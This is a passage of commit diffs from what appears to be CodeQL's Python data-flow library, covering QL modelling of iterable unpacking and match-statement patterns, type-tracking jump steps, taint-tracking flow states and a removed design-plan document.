* 4. [Store] Content is stored from `TIterableElement(sequence)` to `sequence`.
* Content type is `TupleElementContent` with indices taken from the syntax.
* For instance, if `sequence` is `(a, *b, c)`, content is written to index 0, 1, and 2.
* This is adequate as the route through `TIterableElement(sequence)` does not transfer precise content.
*
* 5. [Read] Content is read from `sequence` to its elements.
* a) If the element is a plain variable, the target is the corresponding essa node.
*
* b) If the element is itself a sequence, with control-flow node `seq`, the target is `TIterableSequence(seq)`.
*
* c) If the element is a starred variable, with control-flow node `v`, the target is `TIterableElement(v)`.
*
* 6. [Store] Content is stored from `TIterableElement(v)` to the essa variable for `v`, with
* content type `ListElementContent`.
*
* 7. [Flow, Read, Store] Steps 2 through 7 are repeated for all recursive elements which are sequences.
*
*
* We illustrate the above steps on the assignment
*
* ```python
* (a, b) = ["a", SOURCE]
* ```
*
* Looking at the content propagation to `a`:
* `["a", SOURCE]`: [ListElementContent]
*
* --Step 1a-->
*
* `TIterableSequence((a, b))`: [ListElementContent]
*
* --Step 3-->
*
* `TIterableElement((a, b))`: []
*
* --Step 4-->
*
* `(a, b)`: [TupleElementContent(0)]
*
* --Step 5a-->
*
* `a`: []
*
 * This means there is data-flow from the RHS to `a` (an over-approximation). The same logic shows there is data-flow to `b`. Note that _Step 3_ and _Step 4_ would not have been needed if the RHS had been a tuple (since that would have been able to use _Step 2_ instead).
*
* Another, more complicated example:
* ```python
* (a, [b, *c]) = ["a", [SOURCE]]
* ```
* where the path to `c` is
*
* `["a", [SOURCE]]`: [ListElementContent; ListElementContent]
*
* --Step 1a-->
*
* `TIterableSequence((a, [b, *c]))`: [ListElementContent; ListElementContent]
*
* --Step 3-->
*
* `TIterableElement((a, [b, *c]))`: [ListElementContent]
*
* --Step 4-->
*
* `(a, [b, *c])`: [TupleElementContent(1); ListElementContent]
*
* --Step 5b-->
*
* `TIterableSequence([b, *c])`: [ListElementContent]
*
* --Step 3-->
*
* `TIterableElement([b, *c])`: []
*
* --Step 4-->
*
* `[b, *c]`: [TupleElementContent(1)]
*
* --Step 5c-->
*
* `TIterableElement(c)`: []
*
* --Step 6-->
*
* `c`: [ListElementContent]
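 *
 * As a concrete, runnable illustration of the runtime behaviour of the examples above
 * (here `SOURCE` is just a hypothetical placeholder value, not anything defined by this library):
 * ```python
 * SOURCE = "tainted"  # hypothetical stand-in for a tainted value
 *
 * (a, b) = ["a", SOURCE]               # a == "a", b == "tainted"
 * (a, [b, *c]) = ("a", ["b", SOURCE])  # a == "a", b == "b", c == ["tainted"]
 * (a, [b, *c]) = ["a", [SOURCE]]       # a == "a", b == "tainted", c == []
 * print(a, b, c)
 * ```
 * The modeling over-approximates the list cases: list content does not distinguish indices, so for
 * the first assignment both `a` and `b` are considered to receive the value.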
*/
private import python
private import DataFlowPublic
/**
* The target of a `for`, e.g. `x` in `for x in list` or in `[42 for x in list]`.
* This class also records the source, which in both above cases is `list`.
* This class abstracts away the differing representations of comprehensions and
* for statements.
*/
class ForTarget extends ControlFlowNode {
Expr source;
ForTarget() {
exists(For for |
source = for.getIter() and
this.getNode() = for.getTarget() and
not for = any(Comp comp).getNthInnerLoop(0)
)
or
exists(Comp comp |
source = comp.getIterable() and
this.getNode() = comp.getNthInnerLoop(0).getTarget()
)
}
Expr getSource() { result = source }
}
/** The LHS of an assignment; it also records the assigned value. */
class AssignmentTarget extends ControlFlowNode {
Expr value;
AssignmentTarget() {
exists(Assign assign | this.getNode() = assign.getATarget() | value = assign.getValue())
}
Expr getValue() { result = value }
}
/** A direct (or top-level) target of an unpacking assignment. */
class UnpackingAssignmentDirectTarget extends ControlFlowNode {
Expr value;
UnpackingAssignmentDirectTarget() {
this instanceof SequenceNode and
(
value = this.(AssignmentTarget).getValue()
or
value = this.(ForTarget).getSource()
)
}
Expr getValue() { result = value }
}
/** A (possibly recursive) target of an unpacking assignment. */
class UnpackingAssignmentTarget extends ControlFlowNode {
UnpackingAssignmentTarget() {
this instanceof UnpackingAssignmentDirectTarget
or
this = any(UnpackingAssignmentSequenceTarget parent).getAnElement()
}
}
/** A (possibly recursive) target of an unpacking assignment which is also a sequence. */
class UnpackingAssignmentSequenceTarget extends UnpackingAssignmentTarget instanceof SequenceNode {
ControlFlowNode getElement(int i) { result = super.getElement(i) }
ControlFlowNode getAnElement() { result = this.getElement(_) }
}
/**
* Step 1a
* Data flows from `iterable` to `TIterableSequence(sequence)`
*/
predicate iterableUnpackingAssignmentFlowStep(Node nodeFrom, Node nodeTo) {
exists(AssignmentTarget target |
nodeFrom.asExpr() = target.getValue() and
nodeTo = TIterableSequenceNode(target)
)
}
/**
* Step 1b
* Data is read from `iterable` to `TIterableSequence(sequence)`
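 *
 * This is the `for`-target case. A small, hypothetical runnable illustration (the values are made up):
 * ```python
 * for a, b in [(1, "x"), (2, "y")]:  # each element of the iterable is unpacked into the target (a, b)
 *     print(a, b)                    # prints "1 x", then "2 y"
 * ```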
*/
predicate iterableUnpackingForReadStep(CfgNode nodeFrom, Content c, Node nodeTo) {
exists(ForTarget target |
nodeFrom.asExpr() = target.getSource() and
target instanceof SequenceNode and
nodeTo = TIterableSequenceNode(target)
) and
(
c instanceof ListElementContent
or
c instanceof SetElementContent
)
}
/**
* Step 2
* Data flows from `TIterableSequence(sequence)` to `sequence`
*/
predicate iterableUnpackingTupleFlowStep(Node nodeFrom, Node nodeTo) {
exists(UnpackingAssignmentSequenceTarget target |
nodeFrom = TIterableSequenceNode(target) and
nodeTo.asCfgNode() = target
)
}
/**
* Step 3
* Data flows from `TIterableSequence(sequence)` into `TIterableElement(sequence)`.
* As `sequence` is modeled as a tuple, we will not read tuple content as that would allow
* crosstalk.
*/
predicate iterableUnpackingConvertingReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(UnpackingAssignmentSequenceTarget target |
nodeFrom = TIterableSequenceNode(target) and
nodeTo = TIterableElementNode(target) and
(
c instanceof ListElementContent
or
c instanceof SetElementContent
// TODO: dict content in iterable unpacking not handled
)
)
}
/**
* Step 4
* Data flows from `TIterableElement(sequence)` to `sequence`.
* Content type is `TupleElementContent` with indices taken from the syntax.
* For instance, if `sequence` is `(a, *b, c)`, content is written to index 0, 1, and 2.
*/
predicate iterableUnpackingConvertingStoreStep(Node nodeFrom, Content c, Node nodeTo) {
exists(UnpackingAssignmentSequenceTarget target |
nodeFrom = TIterableElementNode(target) and
nodeTo.asCfgNode() = target and
exists(int index | exists(target.getElement(index)) |
c.(TupleElementContent).getIndex() = index
)
)
}
/**
* Step 5
* For a sequence node inside an iterable unpacking, data flows from the sequence to its elements. There are
* three cases for what `toNode` should be:
* a) If the element is a plain variable, `toNode` is the corresponding essa node.
*
* b) If the element is itself a sequence, with control-flow node `seq`, `toNode` is `TIterableSequence(seq)`.
*
* c) If the element is a starred variable, with control-flow node `v`, `toNode` is `TIterableElement(v)`.
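 *
 * As a concrete, hypothetical illustration of the runtime behaviour (values are made up):
 * ```python
 * (a, *b, c) = (1, 2, 3, 4)  # a == 1 (index 0), b == [2, 3] (indices 1 and 2), c == 4 (the last index)
 * print(a, b, c)
 * ```
 * The index arithmetic below mirrors this: elements before the star read a precise tuple index, the
 * star reads every index from its own position onwards, and elements after the star read every index
 * from their position minus one onwards (an over-approximation).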
*/
predicate iterableUnpackingElementReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(
UnpackingAssignmentSequenceTarget target, int index, ControlFlowNode element, int starIndex
|
target.getElement(starIndex) instanceof StarredNode
or
not exists(target.getAnElement().(StarredNode)) and
starIndex = -1
|
nodeFrom.asCfgNode() = target and
element = target.getElement(index) and
(
if starIndex = -1 or index < starIndex
then c.(TupleElementContent).getIndex() = index
else
// This could get big if big tuples exist
if index = starIndex
then c.(TupleElementContent).getIndex() >= index
else c.(TupleElementContent).getIndex() >= index - 1
) and
(
if element instanceof SequenceNode
then
// Step 5b
nodeTo = TIterableSequenceNode(element)
else
if element instanceof StarredNode
then
// Step 5c
nodeTo = TIterableElementNode(element)
else
// Step 5a
nodeTo.asVar().getDefinition().(MultiAssignmentDefinition).getDefiningNode() = element
)
)
}
/**
* Step 6
* Data flows from `TIterableElement(v)` to the essa variable for `v`, with
* content type `ListElementContent`.
*/
predicate iterableUnpackingStarredElementStoreStep(Node nodeFrom, Content c, Node nodeTo) {
exists(ControlFlowNode starred | starred.getNode() instanceof Starred |
nodeFrom = TIterableElementNode(starred) and
nodeTo.asVar().getDefinition().(MultiAssignmentDefinition).getDefiningNode() = starred and
c instanceof ListElementContent
)
}
/** All read steps associated with unpacking assignment. */
predicate iterableUnpackingReadStep(Node nodeFrom, Content c, Node nodeTo) {
iterableUnpackingForReadStep(nodeFrom, c, nodeTo)
or
iterableUnpackingElementReadStep(nodeFrom, c, nodeTo)
or
iterableUnpackingConvertingReadStep(nodeFrom, c, nodeTo)
}
/** All store steps associated with unpacking assignment. */
predicate iterableUnpackingStoreStep(Node nodeFrom, Content c, Node nodeTo) {
iterableUnpackingStarredElementStoreStep(nodeFrom, c, nodeTo)
or
iterableUnpackingConvertingStoreStep(nodeFrom, c, nodeTo)
}
/** All flow steps associated with unpacking assignment. */
predicate iterableUnpackingFlowStep(Node nodeFrom, Node nodeTo) {
iterableUnpackingAssignmentFlowStep(nodeFrom, nodeTo)
or
iterableUnpackingTupleFlowStep(nodeFrom, nodeTo)
}

View File

@@ -6,9 +6,10 @@
* local tracking within a function.
*/
import python
private import python
import DataFlowPublic
private import DataFlowPrivate
private import semmle.python.internal.CachedStages
/**
* A data flow node that is a source of local flow. This includes things like
@@ -33,6 +34,7 @@ private import DataFlowPrivate
class LocalSourceNode extends Node {
cached
LocalSourceNode() {
Stages::DataFlow::ref() and
this instanceof ExprNode and
not simpleLocalFlowStep(_, this)
or
@@ -176,6 +178,7 @@ private module Cached {
*/
cached
predicate hasLocalSource(Node sink, LocalSourceNode source) {
Stages::DataFlow::ref() and
source = sink
or
exists(Node second |

View File

@@ -0,0 +1,311 @@
/**
* There are a number of patterns available for the match statement.
* Each one transfers data and content differently to its parts.
*
* Furthermore, given a successful match, we can infer some data about
* the subject. Consider the example:
* ```python
* match choice:
* case 'Y':
* ...body
* ```
* Inside `body`, we know that `choice` has the value `'Y'`.
*
* A similar thing happens with the "as pattern". Consider the example:
* ```python
* match choice:
* case ('y'|'Y') as c:
* ...body
* ```
* By the binding rules, there is data flow from `choice` to `c`. But we
* can infer the value of `c` to be either `'y'` or `'Y'` if the match succeeds.
*
* We will treat such inferences separately as guards. First we will model the data flow
* stemming from the bindings and the matching of shape. Below, 'subject' is not necessarily the
* top-level subject of the match, but rather the part recursively matched by the current pattern.
* For instance, in the example:
* ```python
* match command:
* case ('quit' as c) | ('go', ('up'|'down') as c):
* ...body
* ```
 * `command` is the subject of the first as-pattern, while the second component of `command`
 * is the subject of the second as-pattern. As such, 'subject' refers to the part of the value matched by the pattern under evaluation.
*
* - as pattern: subject flows to alias as well as to the interior pattern
* - or pattern: subject flows to each alternative
* - literal pattern: flow from the literal to the pattern, to add information
* - capture pattern: subject flows to the variable
* - wildcard pattern: no flow
* - value pattern: flow from the value to the pattern, to add information
* - sequence pattern: each element reads from subject at the associated index
* - star pattern: subject flows to the variable, possibly via a conversion
* - mapping pattern: each value reads from subject at the associated key
* - double star pattern: subject flows to the variable, possibly via a conversion
* - key-value pattern: the value reads from the subject at the key (see mapping pattern)
* - class pattern: all keywords read the appropriate attribute from the subject
* - keyword pattern: the appropriate attribute is read from the subject (see class pattern)
*
* Inside the class pattern, we also find positional arguments. They are converted to
* keyword arguments using the `__match_args__` attribute on the class. We do not
* currently model this.
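 *
 * A small, hypothetical example (Python 3.10+) combining several of the pattern kinds listed above;
 * the class `Point` and all values are made up for illustration:
 * ```python
 * class Point:
 *     __match_args__ = ("x", "y")
 *     def __init__(self, x, y):
 *         self.x, self.y = x, y
 *
 * def describe(command):
 *     match command:
 *         case ("go", ("up" | "down") as direction):  # or-pattern inside an as-pattern
 *             return direction
 *         case {"color": c, **rest}:                  # mapping pattern with a double star pattern
 *             return (c, rest)
 *         case Point(x=px, y=py):                     # class pattern with keyword patterns
 *             return (px, py)
 *         case _:                                     # wildcard pattern
 *             return None
 *
 * print(describe(("go", "up")))              # up
 * print(describe({"color": "red", "n": 1}))  # ('red', {'n': 1})
 * print(describe(Point(1, 2)))               # (1, 2)
 * ```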
*/
private import python
private import DataFlowPublic
/**
* Holds when there is flow from the subject `nodeFrom` to the (top-level) pattern `nodeTo` of a `match` statement.
*
* The subject of a match flows to each top-level pattern
* (a pattern directly under a `case` statement).
*
* We could consider a model closer to use-use-flow, where the subject
* only flows to the first top-level pattern and from there to the
* following ones.
*/
predicate matchSubjectFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchStmt match, Expr subject, Pattern target |
subject = match.getSubject() and
target = match.getCase(_).(Case).getPattern()
|
nodeFrom.asExpr() = subject and
nodeTo.asCfgNode().getNode() = target
)
}
/**
* as pattern: subject flows to alias as well as to the interior pattern
* syntax (toplevel): `case pattern as alias:`
*/
predicate matchAsFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchAsPattern subject, Name alias | alias = subject.getAlias() |
// We make the subject flow to the interior pattern via the alias.
// That way, information can propagate from the interior pattern to the alias.
//
// the subject flows to the interior pattern
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = subject.getPattern()
or
// the interior pattern flows to the alias
nodeFrom.asCfgNode().getNode() = subject.getPattern() and
nodeTo.asVar().getDefinition().(PatternAliasDefinition).getDefiningNode().getNode() = alias
)
}
/**
* or pattern: subject flows to each alternative
* syntax (toplevel): `case alt1 | alt2:`
*/
predicate matchOrFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchOrPattern subject, Pattern pattern | pattern = subject.getAPattern() |
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = pattern
)
}
/**
* literal pattern: flow from the literal to the pattern, to add information
* syntax (toplevel): `case literal:`
*/
predicate matchLiteralFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchLiteralPattern pattern, Expr literal | literal = pattern.getLiteral() |
nodeFrom.asExpr() = literal and
nodeTo.asCfgNode().getNode() = pattern
)
}
/**
* capture pattern: subject flows to the variable
* syntax (toplevel): `case var:`
*/
predicate matchCaptureFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchCapturePattern capture, Name var | capture.getVariable() = var |
nodeFrom.asCfgNode().getNode() = capture and
nodeTo.asVar().getDefinition().(PatternCaptureDefinition).getDefiningNode().getNode() = var
)
}
/**
* value pattern: flow from the value to the pattern, to add information
* syntax (toplevel): `case Dotted.value:`
*/
predicate matchValueFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchValuePattern pattern, Expr value | value = pattern.getValue() |
nodeFrom.asExpr() = value and
nodeTo.asCfgNode().getNode() = pattern
)
}
/**
* sequence pattern: each element reads from subject at the associated index
* syntax (toplevel): `case [a, b]:`
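 *
 * A small, hypothetical example (values are made up):
 * ```python
 * match (1, "x"):
 *     case [a, b]:  # a reads index 0 (a == 1), b reads index 1 (b == "x")
 *         print(a, b)
 * ```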
*/
predicate matchSequenceReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchSequencePattern subject, int index, Pattern element |
element = subject.getPattern(index)
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = element and
(
// tuple content
c.(TupleElementContent).getIndex() = index
or
// list content
c instanceof ListElementContent
// set content is excluded from sequence patterns,
// see https://www.python.org/dev/peps/pep-0635/#sequence-patterns
)
)
}
/**
* star pattern: subject flows to the variable, possibly via a conversion
 * syntax (toplevel): `case [*var]:` (star patterns only occur inside sequence patterns)
*
* We decompose this flow into a read step and a store step. The read step
* reads both tuple and list content, the store step only stores list content.
* This way, we convert all content to list content.
*
* This is the read step.
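 *
 * A small, hypothetical example (values are made up):
 * ```python
 * match (1, 2, 3):
 *     case [first, *rest]:  # rest is always bound to a list, here [2, 3]
 *         print(first, rest)
 * ```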
*/
predicate matchStarReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchSequencePattern subject, int index, MatchStarPattern star |
star = subject.getPattern(index)
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo = TStarPatternElementNode(star) and
(
// tuple content
c.(TupleElementContent).getIndex() >= index
or
// list content
c instanceof ListElementContent
// set content is excluded from sequence patterns,
// see https://www.python.org/dev/peps/pep-0635/#sequence-patterns
)
)
}
/**
* star pattern: subject flows to the variable, possibly via a conversion
 * syntax (toplevel): `case [*var]:` (star patterns only occur inside sequence patterns)
*
* We decompose this flow into a read step and a store step. The read step
* reads both tuple and list content, the store step only stores list content.
* This way, we convert all content to list content.
*
* This is the store step.
*/
predicate matchStarStoreStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchStarPattern star |
nodeFrom = TStarPatternElementNode(star) and
nodeTo.asCfgNode().getNode() = star.getTarget() and
c instanceof ListElementContent
)
}
/**
* mapping pattern: each value reads from subject at the associated key
* syntax (toplevel): `case {"color": c, "height": x}:`
*/
predicate matchMappingReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(
MatchMappingPattern subject, MatchKeyValuePattern keyValue, MatchLiteralPattern key,
Pattern value
|
keyValue = subject.getAMapping() and
key = keyValue.getKey() and
value = keyValue.getValue()
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = value and
c.(DictionaryElementContent).getKey() = key.getLiteral().(StrConst).getText()
)
}
/**
* double star pattern: subject flows to the variable, possibly via a conversion
* syntax (toplevel): `case {**var}:`
*
* Dictionary content flows to the double star, but all mentioned keys in the
* mapping pattern should be cleared.
*/
predicate matchMappingFlowStep(Node nodeFrom, Node nodeTo) {
exists(MatchMappingPattern subject, MatchDoubleStarPattern dstar | dstar = subject.getAMapping() |
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = dstar.getTarget()
)
}
/**
* Bindings that are mentioned in a mapping pattern will not be available
* to a double star pattern in the same mapping pattern.
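 *
 * A small, hypothetical example (values are made up):
 * ```python
 * match {"color": "red", "height": 3}:
 *     case {"color": c, **rest}:  # c == "red"; rest == {"height": 3}, so "color" is cleared from rest
 *         print(c, rest)
 * ```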
*/
predicate matchMappingClearStep(Node n, Content c) {
exists(
MatchMappingPattern subject, MatchKeyValuePattern keyValue, MatchLiteralPattern key,
MatchDoubleStarPattern dstar
|
keyValue = subject.getAMapping() and
key = keyValue.getKey() and
dstar = subject.getAMapping()
|
n.asCfgNode().getNode() = dstar.getTarget() and
c.(DictionaryElementContent).getKey() = key.getLiteral().(StrConst).getText()
)
}
/**
* class pattern: all keywords read the appropriate attribute from the subject
* syntax (toplevel): `case ClassName(attr = val):`
*/
predicate matchClassReadStep(Node nodeFrom, Content c, Node nodeTo) {
exists(MatchClassPattern subject, MatchKeywordPattern keyword, Name attr, Pattern value |
keyword = subject.getKeyword(_) and
attr = keyword.getAttribute() and
value = keyword.getValue()
|
nodeFrom.asCfgNode().getNode() = subject and
nodeTo.asCfgNode().getNode() = value and
c.(AttributeContent).getAttribute() = attr.getId()
)
}
/** All flow steps associated with match. */
predicate matchFlowStep(Node nodeFrom, Node nodeTo) {
matchSubjectFlowStep(nodeFrom, nodeTo)
or
matchAsFlowStep(nodeFrom, nodeTo)
or
matchOrFlowStep(nodeFrom, nodeTo)
or
matchLiteralFlowStep(nodeFrom, nodeTo)
or
matchCaptureFlowStep(nodeFrom, nodeTo)
or
matchValueFlowStep(nodeFrom, nodeTo)
or
matchMappingFlowStep(nodeFrom, nodeTo)
}
/** All read steps associated with match. */
predicate matchReadStep(Node nodeFrom, Content c, Node nodeTo) {
matchClassReadStep(nodeFrom, c, nodeTo)
or
matchSequenceReadStep(nodeFrom, c, nodeTo)
or
matchMappingReadStep(nodeFrom, c, nodeTo)
or
matchStarReadStep(nodeFrom, c, nodeTo)
}
/** All store steps associated with match. */
predicate matchStoreStep(Node nodeFrom, Content c, Node nodeTo) {
matchStarStoreStep(nodeFrom, c, nodeTo)
}
/**
* All clear steps associated with match
*/
predicate matchClearStep(Node n, Content c) { matchMappingClearStep(n, c) }

View File

@@ -9,6 +9,7 @@
private import python
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.dataflow.new.internal.DataFlowPrivate as DataFlowPrivate
/**
* INTERNAL: Do not use.
@@ -66,7 +67,12 @@ string prettyNodeForInlineTest(DataFlow::Node node) {
result = "[post]" + prettyExpr(e)
)
or
exists(Expr e | e = node.(DataFlowPrivate::SyntheticPreUpdateNode).getPostUpdateNode().asExpr() |
result = "[pre]" + prettyExpr(e)
)
or
not exists(node.asExpr()) and
not exists(node.(DataFlow::PostUpdateNode).getPreUpdateNode().asExpr()) and
not exists(node.(DataFlowPrivate::SyntheticPreUpdateNode).getPostUpdateNode().asExpr()) and
result = node.toString()
}

View File

@@ -34,7 +34,8 @@ private module Cached {
CallStep() or
ReturnStep() or
StoreStep(ContentName content) or
LoadStep(ContentName content)
LoadStep(ContentName content) or
JumpStep()
/** Gets the summary resulting from appending `step` to type-tracking summary `tt`. */
cached
@@ -49,6 +50,9 @@ private module Cached {
step = LoadStep(content) and result = MkTypeTracker(hasCall, "")
or
exists(string p | step = StoreStep(p) and content = "" and result = MkTypeTracker(hasCall, p))
or
step = JumpStep() and
result = MkTypeTracker(false, content)
)
}
@@ -67,6 +71,9 @@ private module Cached {
)
or
step = StoreStep(content) and result = MkTypeBackTracker(hasReturn, "")
or
step = JumpStep() and
result = MkTypeBackTracker(false, content)
)
}
@@ -110,12 +117,17 @@ class StepSummary extends TStepSummary {
exists(string content | this = StoreStep(content) | result = "store " + content)
or
exists(string content | this = LoadStep(content) | result = "load " + content)
or
this instanceof JumpStep and result = "jump"
}
}
pragma[noinline]
private predicate smallstepNoCall(Node nodeFrom, TypeTrackingNode nodeTo, StepSummary summary) {
jumpStep(nodeFrom, nodeTo) and
summary = JumpStep()
or
levelStep(nodeFrom, nodeTo) and
summary = LevelStep()
or
exists(string content |

View File

@@ -5,6 +5,7 @@
private import python
private import semmle.python.dataflow.new.internal.DataFlowPublic as DataFlowPublic
private import semmle.python.dataflow.new.internal.DataFlowPrivate as DataFlowPrivate
import semmle.python.internal.CachedStages
class Node = DataFlowPublic::Node;
@@ -12,13 +13,19 @@ class TypeTrackingNode = DataFlowPublic::TypeTrackingNode;
predicate simpleLocalFlowStep = DataFlowPrivate::simpleLocalFlowStep/2;
predicate jumpStep = DataFlowPrivate::jumpStep/2;
predicate jumpStep = DataFlowPrivate::jumpStepSharedWithTypeTracker/2;
/** Holds if there is a level step from `pred` to `succ`. */
predicate levelStep(Node pred, Node succ) { none() }
/**
* Gets the name of a possible piece of content. For Python, this is currently only attribute names,
* using the name of the attribute for the corresponding content.
*/
string getPossibleContentName() { result = any(DataFlowPublic::AttrRef a).getAttributeName() }
string getPossibleContentName() {
Stages::TypeTracking::ref() and // the TypeTracking::append() etc. predicates that we want to cache depend on this predicate, so we can place the `ref()` call here to get around identical files.
result = any(DataFlowPublic::AttrRef a).getAttributeName()
}
/**
* Gets a callable for the call where `nodeFrom` is used as the `i`'th argument.

View File

@@ -1,138 +0,0 @@
# Using the shared dataflow library
## File organisation
The files currently live in `experimental` (whereas the existing implementation lives in `semmle\python\dataflow`).
There you will find `DataFlow.qll`, `DataFlow2.qll` etc., which refer to `internal\DataFlowImpl`, `internal\DataFlowImpl2` etc. respectively. The `DataFlowImplN` files are all identical copies to avoid mutual recursion. They start off by including two files, `internal\DataFlowImplCommon` and `internal\DataFlowImplSpecific`. The former contains all the language-agnostic definitions, while the latter is where we describe our favorite language. `Specific` simply forwards to two other files, `internal\DataFlowPrivate.qll` and `internal\DataFlowPublic.qll`. Definitions in the former will be hidden behind a `private` modifier, while those in the latter can be referred to in data flow queries. For instance, the definition of `DataFlow::Node` should likely be in `DataFlowPublic.qll`.
## Define the dataflow graph
In order to use the dataflow library, we need to define the dataflow graph,
that is, define the nodes and the edges.
### Define the nodes
The nodes are defined in the type `DataFlow::Node` (found in `DataFlowPublic.qll`).
This should likely be an IPA type, so we can extend it as needed.
Typical cases needed to construct the call graph include
- argument node
- parameter node
- return node
Typical extensions include
- postupdate nodes
- implicit `this`-nodes
### Define the edges
The edges split into local flow (within a function) and global flow (the call graph, between functions/procedures).
Extra flow, such as reading from and writing to global variables, can be captured in `jumpStep`.
The local flow should be obtainable from an SSA computation.
Local flow nodes are generally either control flow nodes or SSA variables.
Flow from control flow nodes to SSA variables comes from SSA variable definitions, while flow from SSA variables to control flow nodes comes from def-use pairs.
The global flow should be obtainable from a `PointsTo` analysis. It is specified via `viableCallable` and
`getAnOutNode`. Consider making `ReturnKind` a singleton IPA type as in java.
Global flow includes local flow within a consistent call context. Thus, for local flow to count as global flow, all relevant nodes should implement `getEnclosingCallable`.
If complicated dispatch needs to be modelled, try using the `[reduced|pruned]viable*` predicates.
## Field flow
To track flow through fields we need to provide a model of fields, that is the `Content` class.
Field access is specified via `read_step` and `store_step`.
Work is being done to make field flow handle lists and dictionaries and the like.
`PostUpdateNode`s become important when field flow is used, as they track modifications to fields resulting from function calls.
## Type pruning
If type information is available, flows can be discarded on the grounds of type mismatch.
Tracked types are given by the class `DataFlowType` and the predicate `getTypeBound`, and compatibility is recorded in the predicate `compatibleTypes`.
If type pruning is not used, `compatibleTypes` should be implemented as `any`; if it is implemented, say, as `none`, all flows will be pruned.
Further, possible casts are given by the class `CastNode`.
---
# Plan
## Stage I, data flow
### Phase 0, setup
Define minimal IPA type for `DataFlow::Node`
Define all required predicates empty (via `none()`),
except `compatibleTypes` which should be `any()`.
Define `ReturnKind`, `DataFlowType`, and `Content` as singleton IPA types.
### Phase 1, local flow
Implement `simpleLocalFlowStep` based on the existing SSA computation
### Phase 2, local flow
Implement `viableCallable` and `getAnOutNode` based on the existing predicate `PointsTo`.
### Phase 3, field flow
Redefine `Content` and implement `read_step` and `store_step`.
Review use of post-update nodes.
### Phase 4, type pruning
Use type trackers to obtain relevant type information and redefine `DataFlowType` to contain appropriate cases. Record the type information in `getTypeBound`.
Implement `compatibleTypes` (perhaps simply as the identity).
If necessary, re-implement `getErasedRepr` and `ppReprType`.
If necessary, redefine `CastNode`.
### Phase 5, bonus
Review possible use of `[reduced|pruned]viable*` predicates.
Review need for more elaborate `ReturnKind`.
Review need for non-empty `jumpStep`.
Review need for non-empty `isUnreachableInCall`.
## Stage II, taint tracking
### Phase 0, setup
Implement all predicates empty.
### Phase 1, experiments
Try recovering an existing taint tracking query by implementing sources, sinks, sanitizers, and barriers.
---
# Status
## Achieved
- Copy of shared library; implemented enough predicates to make it compile.
- Simple flow into, out of, and through functions.
- Some tests, in particular a skeleton for something comprehensive.
## TODO
- Implementation has largely been done by finding a plausible-sounding predicate in the Python library to refer to. We should review that we actually have the intended semantics in all places.
- Comprehensive testing.
- The regression tests track the value of guards in order to eliminate impossible data flow. We currently have regressions because of this. We cannot readily replicate the existing method, as it uses the interdefinedness of data flow and taint tracking (there is a boolean taint kind). C++ [does something similar](https://github.com/github/codeql/blob/master/cpp/ql/src/semmle/code/cpp/controlflow/internal/ConstantExprs.qll#L27-L36) for eliminating impossible control flow, which we might be able to replicate (they infer values of "interesting" control flow nodes, which are those needed to determine values of guards).
- Flow for some syntactic constructs is handled via extra taint steps in the existing implementation; we should find a way to get data flow for these. Some of this should be covered by field flow.
- A document is being written about proper use of the shared data flow library; this should be adhered to. In particular, we should consider replacing def-use with def-to-first-use and use-to-next-use in local flow.
- We seem to get duplicated results for global flow, as well as flow with and without type (so four times the "unique" results).
- We currently consider control flow nodes like exit nodes for functions; we should probably filter down which ones are of interest.
- We should probably override `toString` for a number of data flow nodes.
- Test flow through classes, constructors and methods.
- What happens with named arguments? What does C# do?
- What should the enclosing callable for global variables be? C++ [makes it the variable itself](https://github.com/github/codeql/blob/master/cpp/ql/src/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll#L417), while C# seems to not have nodes for these but only for their reads and writes.
- Is `yield` another return type? If not, how is it handled?
- Should `OutNode` include magic function calls?
- Consider creating an internal abstract class for nodes as C# does. Among other things, this can help the optimizer by stating that `getEnclosingCallable` [is functional](https://github.com/github/codeql/blob/master/csharp/ql/src/semmle/code/csharp/dataflow/internal/DataFlowPublic.qll#L62).

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
